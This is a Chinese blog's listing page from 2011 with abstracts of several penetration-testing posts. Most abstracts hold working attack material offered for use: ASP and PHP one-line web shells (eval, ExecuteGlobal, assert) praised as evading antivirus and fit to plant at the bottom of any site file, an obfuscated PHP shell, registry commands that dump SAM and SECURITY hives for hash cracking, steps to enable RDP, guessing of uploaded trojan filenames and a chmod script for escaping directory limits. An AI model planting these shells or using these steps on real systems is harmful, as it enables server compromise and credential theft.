摘要: 测试环境:ubuntu 10.10 sqlmap/1.0-dev (r4405) 转载请说明来源:http://hi.baidu.com/nginxshell & lostwolf and http://lcx.cc/?FoxNews=1826.html建议linux下使用sqlmap windows下容易报错 更新升级 : sqlmap -update svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev 帮助: sqlmap -h ******************基本步骤************** 阅读全文
posted @ 2011-12-10 19:53 WHaa_(T_T) 阅读(337) 评论(0) 推荐(0) 编辑
摘要: 以下这个ASP一句话<%If Request("1")<>"" Then ExecuteGlobal(Request("1"))%><?php ($_=@$_GET[2]).@$_($_POST[1])?>上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错,比如index.asp里面也是可以的!因为加了判断!加了判断的PHP一句话,与上面的ASP一句话相同道理,也是可以插在任何PHP文件的最底部不会出错!<?if(isset($_POST['1']) 阅读全文
posted @ 2011-11-20 07:51 WHaa_(T_T) 阅读(206) 评论(0) 推荐(0) 编辑
摘要: 第一种:1.php <?=($_=@$_GET[2]).@$_($_GET[1])?> 在菜刀里写http://www.xxxxx.net/1.php?2=assert密码是1 第二种2.php <? $_=”"; $_[+""]=”; $_=”$_”.”"; $_=($_[+""]|””).($_[+""]|”").($_[+""]^””); ?> <?=${‘_’.$_}['_'](${‘_’.$_}['__']); 阅读全文
posted @ 2011-11-15 20:48 WHaa_(T_T) 阅读(426) 评论(0) 推荐(0) 编辑
摘要: 服务器安全设置>> IIS6.0的安装 开始菜单—>控制面板—>添加或删除程序—>添加/删除Windows组件 应用程序 ———ASP.NET(可选) |——启用网络 COM+ 访问(必选) |——Internet 信息服务(IIS)———Internet 信息服务管理器(必选) |——公用文件(必选) |——万维网服务———Active Server pages(必选) |——Internet 数据连接器(可选)... 阅读全文
posted @ 2011-10-22 03:35 WHaa_(T_T) 阅读(305) 评论(0) 推荐(0) 编辑
摘要: 以下这个ASP一句话,也许是你见都没见过的!<%If Request("1")<>"" Then ExecuteGlobal(Request("1"))%> 上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错,比如index.asp里面也是可以的!因为加了判断! 加了判断的PHP一句话,与上面的ASP一句话相同道理,也是可以插在任何PHP文件的最底部不会出错!<?if(isset($_POST['1'])){eval($_POST['1']);} 阅读全文
posted @ 2011-10-17 21:46 WHaa_(T_T) 阅读(345) 评论(0) 推荐(0) 编辑
摘要: 收集了一些很实用的脚本,渗透基本上都会用的到:用win命令查找3389的port(包括修改后的):C:\>tasklist /svc |find “TermService”svchost.exe 1300 TermServiceC:\>netstat -ano |find “1300″TCP 0.0.0.0:61321 0.0.0.0:0 LISTENING 1300TCP 210.72.225.74:61321 123.114.166.67:1697 ESTABLISHED 1300用win命令开3389:wmic RDTOGGLE WHERE ServerName=’%COMP 阅读全文
posted @ 2011-10-02 05:23 WHaa_(T_T) 阅读(293) 评论(0) 推荐(0) 编辑
摘要: LINUX文件权限针对的对象分三类(互斥的关系): 1. user(文件的拥有者) 2. group(文件拥有者所在的组,但不包括user) 3. other(其它用户,即user和group以外的) LINUX用一个3位二进制数对应着文件的3种权限(1表示有该权限,0表示无): 第1位 读 r 100 4 第2位 写 w 010 2 第3位 执行 x 001 1 查看权限 #ls -l 第一列,一共10位(drwxrwxrwx),就代表了文件的权限: 1)第一个d代表是一个目录,如果显示“-”,则说明不是一个目录 2)2-4代表user的权限 3)5-7代表group的权限 4)8-10代表 阅读全文
posted @ 2011-10-02 05:21 WHaa_(T_T) 阅读(250) 评论(0) 推荐(0) 编辑
摘要: 传wce.exe 抓hash 没有任何结果又穿了Pwdump gethashes等。都没有抓到任何数据!最后用reg save hklm\sam c:\sam.hivereg save hklm\system c:\system.hivereg save hklm\security c:\security.hive导出文件然后在cain能够找到hash。。 阅读全文
posted @ 2011-10-02 04:49 WHaa_(T_T) 阅读(295) 评论(0) 推荐(0) 编辑
摘要: 有时 传了 木马上去后 直接是 xiaoma.asp还有种 是按照时间生成名字如201103091**************.asp下面这种如果又 没有回显的话 就可以做 个字典扫生成字典uploadfile/2011/1/1/2011012847000000.aspuploadfile/2011/1/1/2011012847000001.aspuploadfile/2011/1/1/2011012847000002.aspuploadfile/2011/1/1/2011012847000003.aspuploadfile/2011/1/1/2011012847000004.asp————— 阅读全文
posted @ 2011-10-02 04:39 WHaa_(T_T) 阅读(252) 评论(0) 推荐(0) 编辑
摘要: linux权限多设的比较松的其实,但有的虚拟机还是不能跨目录访问的。在提不了权的情况下,试试如下代码吧。运气好的话说不定就跨过去了。代码如下:<?php$path = stripslashes($_GET['path']);$ok = chmod ($path , 0777);if ($ok == true)echo CHMOD OK , Permission editable file or directory. Permission to write;?><?php$path = stripslashes($_GET['path']);$o 阅读全文
posted @ 2011-10-02 04:28 WHaa_(T_T) 阅读(265) 评论(0) 推荐(0) 编辑